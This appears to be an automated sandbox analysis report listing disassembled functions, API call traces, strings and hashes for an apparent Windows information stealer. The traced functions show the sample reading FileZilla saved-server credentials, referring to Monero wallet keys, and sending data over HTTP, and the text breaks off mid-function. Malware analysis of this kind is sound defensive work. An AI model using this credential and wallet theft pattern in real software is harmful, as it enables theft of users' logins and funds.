                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbd31a1b71dba1035aad2cfcad99c5c1e59b90f24a602c47cb2971e85e659b12
                            • Instruction ID: 06b6715463105c34e66f2f814d3d26d14d2f8e535062d7c8c8b4770cade624de
                            • Opcode Fuzzy Hash: fbd31a1b71dba1035aad2cfcad99c5c1e59b90f24a602c47cb2971e85e659b12
                            • Instruction Fuzzy Hash: 816126F3A082045FF3147A2DEC8977ABBD9EB94320F1A463DDBD483780E939581586C6
                            Function 0092A5D7 Relevance: .2, Instructions: 150COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b9688dbfbedeee57fee5ce0b256f2f71f40e07663a3aec84e2e57625cf7d400
                            • Instruction ID: 3147b828162157012eba0fbab5295f7d3a52e71fa366e3079d364103fca73bf6
                            • Opcode Fuzzy Hash: 3b9688dbfbedeee57fee5ce0b256f2f71f40e07663a3aec84e2e57625cf7d400
                            • Instruction Fuzzy Hash: BA4136F3D082158BE7106D7DDD44366BBD6AB84320F2B4738DED897B84EA78480682C6
                            Function 009835B4 Relevance: .1, Instructions: 148COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a71d55dabe6cc3a82ed67dadf0f4f0947e7f6fd5a5e8ceb8f77ccec43e59663
                            • Instruction ID: 015d4bab9fb3918de1428ea91735b76ba61ec333968319377ea44cf6a830d270
                            • Opcode Fuzzy Hash: 1a71d55dabe6cc3a82ed67dadf0f4f0947e7f6fd5a5e8ceb8f77ccec43e59663
                            • Instruction Fuzzy Hash: A54135F3E092241BE314592CDC947B6B7DADF94722F1A423DAF84A3784E97A1D0482D1
                            Function 0094A785 Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b5c617e51856cd498bf304f48f7fd20b63aabd7fb4fb02c6ca06cb283637de0
                            • Instruction ID: adfd6255673c0732020f7515e0792ffa3531568f6bab91a3ef8ca76cb5f6e12f
                            • Opcode Fuzzy Hash: 0b5c617e51856cd498bf304f48f7fd20b63aabd7fb4fb02c6ca06cb283637de0
                            • Instruction Fuzzy Hash: 683167F7A092185BE350A92AEC847B7F7C9DF90720F168539EAC8D3740F9369805819A
                            Function 00609750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 00600250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00610DBA,00610DB7,00610DB6,00610DB3), ref: 00600362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00600369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00600385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006003CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 006003DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00600419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00600463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 0060051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 0060054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00600562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00600571
                            • lstrcat.KERNEL32(?,url: ), ref: 00600580
                            • lstrcat.KERNEL32(?,00000000), ref: 00600593
                            • lstrcat.KERNEL32(?,00611678), ref: 006005A2
                            • lstrcat.KERNEL32(?,00000000), ref: 006005B5
                            • lstrcat.KERNEL32(?,0061167C), ref: 006005C4
                            • lstrcat.KERNEL32(?,login: ), ref: 006005D3
                            • lstrcat.KERNEL32(?,00000000), ref: 006005E6
                            • lstrcat.KERNEL32(?,00611688), ref: 006005F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00600604
                            • lstrcat.KERNEL32(?,00000000), ref: 00600617
                            • lstrcat.KERNEL32(?,00611698), ref: 00600626
                            • lstrcat.KERNEL32(?,0061169C), ref: 00600635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 0060068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 5410cd5d052a8bae4d42ee306ddd392e1d9df2e103f341d0fdabc464226c716e
                            • Instruction ID: bacb792292a95c2b8acdf137c0c8cf1ee4404134e799b08e114f010015383e9f
                            • Opcode Fuzzy Hash: 5410cd5d052a8bae4d42ee306ddd392e1d9df2e103f341d0fdabc464226c716e
                            • Instruction Fuzzy Hash: 0CD13C71950208ABDB48FBE0DD96EEF737ABF54340F448418F202A60D1EF75AA46CB65
                            Function 005F5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005F59F8
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F5A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F5B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0140E500,00000000,?,01409AF8,00000000,?,00611A1C), ref: 005F5E71
                            • lstrlen.KERNEL32(00000000), ref: 005F5E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 005F5E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F5E9A
                            • lstrlen.KERNEL32(00000000), ref: 005F5EAF
                            • lstrlen.KERNEL32(00000000), ref: 005F5ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005F5EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 005F5F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005F5F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 005F5F4C
                            • InternetCloseHandle.WININET(00000000), ref: 005F5FB0
                            • InternetCloseHandle.WININET(00000000), ref: 005F5FBD
                            • HttpOpenRequestA.WININET(00000000,0140E490,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F5BF8
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • InternetCloseHandle.WININET(00000000), ref: 005F5FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: bfaba6e1d64ef12523755fdf5cbe5e1b5794fcd8a0c96e82a0e036963a200f64
                            • Instruction ID: 791f9b0269fa15582d0b8d6de22fd23bbae3fdf6d54c90ed097628a7c8307ae7
                            • Opcode Fuzzy Hash: bfaba6e1d64ef12523755fdf5cbe5e1b5794fcd8a0c96e82a0e036963a200f64
                            • Instruction Fuzzy Hash: 55122D71960218AADB59EBE0DC95FEFB33ABF54740F40419DB106620D1EF702A4ACF69
                            Function 005FCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FCF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005FD0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005FD0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD208
                            • lstrcat.KERNEL32(?,00611478), ref: 005FD217
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD22A
                            • lstrcat.KERNEL32(?,0061147C), ref: 005FD239
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD24C
                            • lstrcat.KERNEL32(?,00611480), ref: 005FD25B
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD26E
                            • lstrcat.KERNEL32(?,00611484), ref: 005FD27D
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD290
                            • lstrcat.KERNEL32(?,00611488), ref: 005FD29F
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD2B2
                            • lstrcat.KERNEL32(?,0061148C), ref: 005FD2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD2D4
                            • lstrcat.KERNEL32(?,00611490), ref: 005FD2E3
                              • Part of subcall function 0060A820: lstrlen.KERNEL32(005F4F05,?,?,005F4F05,00610DDE), ref: 0060A82B
                              • Part of subcall function 0060A820: lstrcpy.KERNEL32(00610DDE,00000000), ref: 0060A885
                            • lstrlen.KERNEL32(?), ref: 005FD32A
                            • lstrlen.KERNEL32(?), ref: 005FD339
                              • Part of subcall function 0060AA70: StrCmpCA.SHLWAPI(01408800,005FA7A7,?,005FA7A7,01408800), ref: 0060AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 005FD3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 62140cb9a5110bcb3b2baf535ba19283fded3e526f3e5b2c9ee74e3c1f79e262
                            • Instruction ID: 39886db490dfa0c1955d7d5e1ba0f5eee9da23515d311b182b8c46295ea0e419
                            • Opcode Fuzzy Hash: 62140cb9a5110bcb3b2baf535ba19283fded3e526f3e5b2c9ee74e3c1f79e262
                            • Instruction Fuzzy Hash: EDE11C71950208ABCB4CEBE0DD96EEF737ABF64340F104558F147A60D1EE35AA09CB66
                            Function 005FC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0140CEB0,00000000,?,0061144C,00000000,?,?), ref: 005FCA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005FCA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 005FCA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005FCAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005FCAD9
                            • StrStrA.SHLWAPI(?,0140CE68,00610B52), ref: 005FCAF7
                            • StrStrA.SHLWAPI(00000000,0140CDF0), ref: 005FCB1E
